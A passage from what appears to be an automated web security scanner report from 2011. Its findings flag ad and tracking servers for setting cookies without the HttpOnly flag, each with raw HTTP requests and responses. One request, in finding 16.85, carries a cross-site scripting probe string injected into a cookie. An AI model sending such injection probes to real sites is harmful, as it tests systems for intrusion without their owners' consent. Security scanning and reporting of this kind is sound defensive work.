16.72. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:58 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO106Bq|O306Bs|O108EZ|O108Ea|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "4";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

16.73. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:48 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02xiO306Bq|O306Bs|O108FG|O108KY|O108i0; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '804611', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

16.74. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=photos_html=FTyqjPT95zxOfh08A6sicw:adwords-usermgmt=nxJ1qeE2dub0qBBtppwupA; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 11
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:12:04 GMT
Expires: Sun, 04 Sep 2011 04:12:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

16.75. http://ak1.abmr.net/is/r1-ads.ace.advertising.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/r1-ads.ace.advertising.com?U=/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms&V=3-wPIFoasAKtPHZSxOUAYbqaXTMPjgJ+vSrrVXE9AL4eNtH7kmyr+P5PQi31vv0x46uxZtxJ%2fzGn0%3d&I=9A4FEFFF11C0CF6&D=r1.ace.advertising.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-4EC679574DCF656C7A8A556AE8270B6BE3805E46383A6B6BD8703B225F4CF37B-DA51BA75A8F5EBEDF256CF563A7044A6F48692021957BF686B5098126AF08716

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms?01AD=3f771Zx75eiiAo1ICd-29mdsUXR8OA0KjB71jAStEFNKAz1rwOJg4cA&01RI=9A4FEFFF11C0CF6&01NA=
Expires: Sun, 04 Sep 2011 03:04:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:04:02 GMT
Connection: close
Set-Cookie: 01AI=2-2-2327200222D3030DF687157A05E37F0C5F6A6200925CEB23D15726628A0EED5B-45E79EA6132609AE4186BAC5EA99AC008CF4D756B7278F27338A3BBF2DC65D49; expires=Mon, 03-Sep-2012 03:04:02 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


16.76. http://api.aggregateknowledge.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&nocache=0.5398929 HTTP/1.1
Host: api.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 02-Sep-2016 11:12:43 GMT; Path=/
Location: http://api.agkn.com/optout2?s=nai&dc=1
Content-Language: en-US
Content-Length: 0
Date: Sun, 04 Sep 2011 11:12:43 GMT
Connection: close


16.77. http://api.agkn.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.agkn.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&dc=1 HTTP/1.1
Host: api.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Fri, 02-Sep-2016 11:16:47 GMT; Path=/
Location: http://api.aggregateknowledge.com/optout2?s=nai&q=validate
Content-Language: en-US
Content-Length: 0
Date: Sun, 04 Sep 2011 11:16:46 GMT
Connection: close


16.78. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j?s=119232&u=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&a=2&id=35968545&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMST=TmLJ305iyswF; CMD1=AAFehU5iyswAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 02:37:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:37:33 GMT
Content-Length: 936
Connection: close
Set-Cookie: CMID=pCu470PS1JUAACQkUeAAAAAJ;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:37:33 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:37:33 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 02:37:33 GMT
Set-Cookie: CMRUM2=14000000006731d4ad-7dae-4402-b507-a0bc233d79fb;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 02:37:33 GMT
Set-Cookie: CMST=TmLkMU5i5G0C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:37:33 GMT
Set-Cookie: CMDD=AAHRwAE*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 02:37:33 GMT
Set-Cookie: CMD2=AAFbfk5i4gIAAdHAAAOPCAEBAAABW3NOYuRtAAHRwAADjNcBAQAAAVtWTmLhpgAB0cAAA48sAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 02:37:33 GMT

document.write('<iframe id=\'3c5f1556\' name=\'3c5f1556\' src=\'http://cas.sv.us.criteo.com/delivery/afr.php?zoneid=24952&bannerid=159988&did=4525c30c6e&rtb=10&z=0.8&b=_1UiJy1FIJchYk6jmJ18Z4w%253d%253
...[SNIP]...

16.79. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/optout?nai=true&id=1936234986&nocache=0.7927026 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Sep 04 11:17:14 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Fri, 22-Sep-2079 14:31:21 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.7927026&tu=1
Content-Length: 0
Date: Sun, 04 Sep 2011 11:17:14 GMT


16.80. http://avn.innity.com/view/3898/35480/0/1315103295564  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://avn.innity.com
Path:   /view/3898/35480/0/1315103295564

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /view/3898/35480/0/1315103295564 HTTP/1.1
Host: avn.innity.com
Proxy-Connection: keep-alive
Referer: http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:38 GMT
Server: Apache
Expires: Sat, 03 Sep 1983 02:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 02:27:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref=http://www.innity.com/p3p/p3p.xml,CP="CURa ADMa DEVa OUR BUS UNI COM NAV INT"
Set-Cookie: iUB=35480.1%3B; expires=Mon, 03-Sep-2012 02:27:38 GMT; path=/; domain=innity.com
Set-Cookie: iUC=3898.1%3B; expires=Mon, 03-Sep-2012 02:27:38 GMT; path=/; domain=innity.com
Set-Cookie: iUUID=3ec12b035c5d013fb13deb7123891e21; expires=Mon, 03-Sep-2012 02:27:38 GMT; path=/; domain=innity.com
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.81. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036484&ns__t=1315103177178&ns_c=UTF-8&c8=Mumbai%20News%2C%20News%20in%20Mumbai%2C%20Mumbai%20City%20News%20%7C%20Cities%20News%20-%20Times%20of%20India&c7=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&c9=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fmumbaiinterstitial.cms HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 02:25:39 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 02:25:39 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


16.82. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=8500755&c3=3720565304d55bd8eb4bad&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 02:28:05 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 02:28:05 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

16.83. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=538064&ev=6731d4ad-7dae-4402-b507-a0bc233d79fb HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: V=ZZVrXBMk1mFi; cwbh1=996%3B09%2F04%2F2011%3BFACO1%0A3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5; pb_rtb_ev=1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0; C2W4=3ncqaSewwHBKMpwXEV2xPrPwuGXdzMM__jVZBsuS4rDtkvyKd_yspGw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Cache-Control: no-cache, no-store
Set-Cookie: V=ZZVrXBMk1mFi; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 03:58:56 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 03:58:56 GMT; Path=/
Content-Type: image/gif
Date: Sun, 04 Sep 2011 03:58:56 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

16.84. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_41207221382&pid=05eaa309-64d4-c0a7-d349-bc1b1d68d17f&s=728x90&f=0.85&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&cid=oxpv1%3A34-632-1929-2023-5730&hrid=edb2a1dc7ff395103b661a785688d648-1315103288 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1315106840; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_41207221382({"r":null});

16.85. http://c7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=305&g=20&a=494&s=1&t=r HTTP/1.1
Host: c7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B809,20|10_1#365Z3_1#392:305,20|145_2#371Z458_1#371; FFBbh=962B809,20|10_1#0Z3_1#15:305,20|145_2#3Z458_1#0; ZEDOIDX=5; FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'; FFcat=767,33,40:767,4,94:826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0; FFad=0:0:0:0:0:0:0:0:47:1:1:0:1; aps=2; FFMCap=2457960B933,196008:826,114248|0,1#0,24:0,1#0,24; PI=h842216Za680391Zc826000471,826000471Zs318Zt1246

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: FFAbh=977B305,20|494_1#365;expires=Sat, 03 Dec 2011 03:59:04 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=977B305,20|145_2#0Z458_1#0Z494_1#0:809,20|3_1#0Z10_1#0;expires=Mon, 03 Sep 2012 03:59:04 GMT;domain=.zedo.com;path=/;
ETag: "91967049-de5c-4a8e112997f00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=7190
Expires: Sun, 04 Sep 2011 05:58:54 GMT
Date: Sun, 04 Sep 2011 03:59:04 GMT
Connection: close

GIF89a.............!.......,...........D..;


GIF89a.............!.......,...........D..;

16.86. http://cas.criteo.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /delivery/afr.php?zoneid=2873&ct0=http://yads.zedo.com/ads2/c?a=680391%3Bn=826%3Bx=2309%3Bc=826000471,826000471%3Bg=172%3Bi=0%3B1=99%3B2=1%3Bs=318%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=mLs5ThcyantsGCRD8ld6EMRU~080311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bp=8%3Bf=842351%3Bh=842216%3Bo=20%3By=305%3Bv=1%3Bt=r%3Bl=1%3Bs%3D318%3Bu%3DmLs5ThcyantsGCRD8ld6EMRU%7E080311%3Bz%3D0.4584487103923105%3B3%3Dz4-633%3Bk%3D HTTP/1.1
Host: cas.criteo.com
